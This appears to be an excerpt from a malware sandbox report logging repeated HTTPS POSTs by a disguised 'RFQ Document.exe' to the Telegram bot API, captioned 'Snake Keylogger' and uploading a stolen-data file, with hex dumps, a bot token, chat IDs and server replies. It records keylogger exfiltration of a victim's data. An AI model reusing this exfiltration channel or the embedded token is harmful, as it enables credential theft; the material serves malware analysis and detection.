                                            2021-09-28 05:58:29 UTC60OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 36 65 39 37 66 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c6e97fa6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:29 UTC61INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:29 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:29 UTC61INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12619,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808709,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            39192.168.2.449815149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:29 UTC62OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c71df22a
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:29 UTC62OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 31 64 66 32 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c71df22aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:29 UTC62INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:29 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:29 UTC63INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12620,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808709,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.449778149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:21 UTC6OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c25218b6
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:21 UTC6OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 35 32 31 38 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c25218b6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:21 UTC6INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:21 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:21 UTC7INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12583,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808701,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            40192.168.2.449816149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:29 UTC63OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c73cf0fb
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:29 UTC64OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 33 63 66 30 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c73cf0fbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:29 UTC64INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:29 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:29 UTC64INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12621,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808709,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            41192.168.2.449817149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:30 UTC65OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c75bef09
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:30 UTC65OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 35 62 65 66 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c75bef09Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:30 UTC66INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:30 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:30 UTC66INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12622,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808710,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            42192.168.2.449818149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:30 UTC67OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c7906228
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:30 UTC67OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 39 30 36 32 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c7906228Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:30 UTC67INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:30 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:30 UTC68INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12623,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808710,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            43192.168.2.449819149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:30 UTC68OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c7af6092
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:30 UTC68OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 61 66 36 30 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c7af6092Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:30 UTC69INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:30 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:30 UTC69INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12624,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808710,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            44192.168.2.449820149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:30 UTC70OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c7d58614
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:30 UTC70OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 37 64 35 38 36 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
